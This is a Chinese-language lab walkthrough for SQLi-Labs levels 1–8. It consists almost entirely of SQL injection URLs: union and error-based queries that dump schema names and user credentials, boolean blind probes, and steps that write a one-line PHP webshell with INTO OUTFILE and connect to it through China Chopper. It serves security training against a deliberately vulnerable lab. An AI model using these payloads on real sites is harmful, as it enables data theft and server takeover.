sqlilabs闯关小游戏(less1-8)
get -error based -single quotes(单引号) -string
1、判断注入点
http://sqlilab.pl.com:8080/Less-1/
http://sqlilab.pl.com:8080/Less-1/?id=1
http://sqlilab.pl.com:8080/Less-1/?id=1'(可能存在注入点)
http://sqlilab.pl.com:8080/Less-1/?id=1' and '1'='1(回显正常)
http://sqlilab.pl.com:8080/Less-1/?id=1' and '1'='2(无回显信息)(注入点为字符型)
2、判断字段数
http://sqlilab.pl.com:8080/Less-1/?id=1' order by 4 --+
http://sqlilab.pl.com:8080/Less-1/?id=1' order by 3 --+(回显正常)(字段数为3)
http://sqlilab.pl.com:8080/Less-1/?id=-1' union select 1,2,3 --+
3、暴数据库名(当前及所有)
http://sqlilab.pl.com:8080/Less-1/?id=' union select 1,database(),3 --+
http://sqlilab.pl.com:8080/Less-1/?id=' union select 1,group_concat(schema_name),3 from information_schema.schemata --+
4、爆表
http://sqlilab.pl.com:8080/Less-1/?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
5、爆字段
http://sqlilab.pl.com:8080/Less-1/?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' --+
6、爆数据
http://sqlilab.pl.com:8080/Less-1/?id=' union select 1,group_concat(username),group_concat(password) from security.users --+
less-2
get-error based -integer(整型) based
http://sqlilab.pl.com:8080/Less-2/?id=1'(回显错误,可能存在注入点)
http://sqlilab.pl.com:8080/Less-2/?id=1 and 1=1(回显正常)
http://sqlilab.pl.com:8080/Less-2/?id=1 and 1=2(无回显信息)(integer injection)
http://sqlilab.pl.com:8080/Less-2/?id=1 order by 3(回显正常)
http://sqlilab.pl.com:8080/Less-2/?id=-1 union select 1,2,3
http://sqlilab.pl.com:8080/Less-2/?id=-1 union select 1,database(),3
http://sqlilab.pl.com:8080/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata
less-3
get -error based -single quotes with twist(括号) -string
http://sqlilab.pl.com:8080/Less-3/?id=1')--+(推出(’id‘))
http://sqlilab.pl.com:8080/Less-3/?id=1') order by 3--+
http://sqlilab.pl.com:8080/Less-3/?id=-1') union select 1,2,3 --+
less-4
get -error based -double quotes -string
http://sqlilab.pl.com:8080/Less-4/?id=1"(回显错误,存在注入点)
http://sqlilab.pl.com:8080/Less-4/?id=1") --+(回显正常)
http://sqlilab.pl.com:8080/Less-4/?id=-1") union select 1,2,3--+
less-5
get -double injection -single quotes -string(双注入:利用count(), group by, floor(), rand()进行报错)
select count( * ) from tbl_name(三行以上的表) group by floor(rand(0)*2)
http://sqlilab.pl.com:8080/Less-5/?id=1
http://sqlilab.pl.com:8080/Less-5/?id=1‘(回显错误)
http://sqlilab.pl.com:8080/Less-5/?id=1’ --+(回显正常)
http://sqlilab.pl.com:8080/Less-5/?id=1' union select 1,count(*),concat((select database()),':',floor(rand(0) *2)) as a from information_schema.tables group by a --+
http://sqlilab.pl.com:8080/Less-5/?id=1' union select 1,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),':',floor(rand(0) *2)) as a from information_schema.tables group by a --+
less-6
get -double injection -double quotes -string
http://sqlilab.pl.com:8080/Less-6/?id=1
http://sqlilab.pl.com:8080/Less-6/?id=1'(回想正常)
http://sqlilab.pl.com:8080/Less-6/?id=1"(回显错误)
http://sqlilab.pl.com:8080/Less-6/?id=1" and 1=1--+ (回显正常)
http://sqlilab.pl.com:8080/Less-6/?id=1" and 1=2--+ (回显无信息)
http://sqlilab.pl.com:8080/Less-6/?id=1"order by 4--+(回显错误)
http://sqlilab.pl.com:8080/Less-6/?id=1"union select 1,count(),concat((select database()),':',floor(rand(0)2)) as a from information_schema.tables group by a--+
http://sqlilab.pl.com:8080/Less-6/?id=1"union select 1,count( * ),concat((select username from security.users limit 0,1),':',floor(rand(0)*2)) as a from information_schema.tables group by a--+)
less-7
get -dump into outfile -string(转存到输出文件)
http://127.0.0.1:8080/Less-7/?id=1
http://127.0.0.1:8080/Less-7/?id=1‘(回显错误)
http://127.0.0.1:8080/Less-7/?id=1')) and 1=1--+(回显正常)(推出(('id')))
http://127.0.0.1:8080/Less-1/?id=-1'union select 1,2,@@datadir--+(推出网站绝对路径)
http://127.0.0.1:8080/Less-7/?id=1')) and (select count(*) from mysql.user)>0 --+(回显正常)(推出具有文件读写权限)
http://127.0.0.1:8080/Less-7/?id=1')) union select 1,2,3 into outfile "less-7text.txt的绝对路径"--+(即使回显错误,文件也已经生成了)
http://sqlilab.pl.com:8080/Less-7/?id=1')) union select 1,2,'<一句话木马>' into outfile "C:\users\73125\software\phpstudy_pro\www\sqlilab.pl.com\Less-7\test.php" -- +(写入文件过后访问)
http://sqlilab.pl.com:8080/less-7/test.php(复制链接到中国菜刀进行添加)
less-8
get -blind -boolian based -single quotes
http://sqlilab.pl.com:8080/Less-8/?id=1(回显正常)
http://sqlilab.pl.com:8080/Less-8/?id=1'(无回显信息)
http://sqlilab.pl.com:8080/Less-8/?id=1' --+(回显正常)
http://sqlilab.pl.com:8080/Less-8/?id=1'and 1=1--+(回显正常)
http://sqlilab.pl.com:8080/Less-8/?id=1'and 1=2--+(无回显信息)
http://sqlilab.pl.com:8080/Less-8/?id=1'and length(database())=8--+(数据库名长度为8)
http://sqlilab.pl.com:8080/Less-8/?id=1'and substring(database(),1,1)='s'--+(数据库名第一位是 s)
编写python脚本进行爆库
res = urllib.request.urlopen(final_url)
echo = res.read().decode("utf-8")
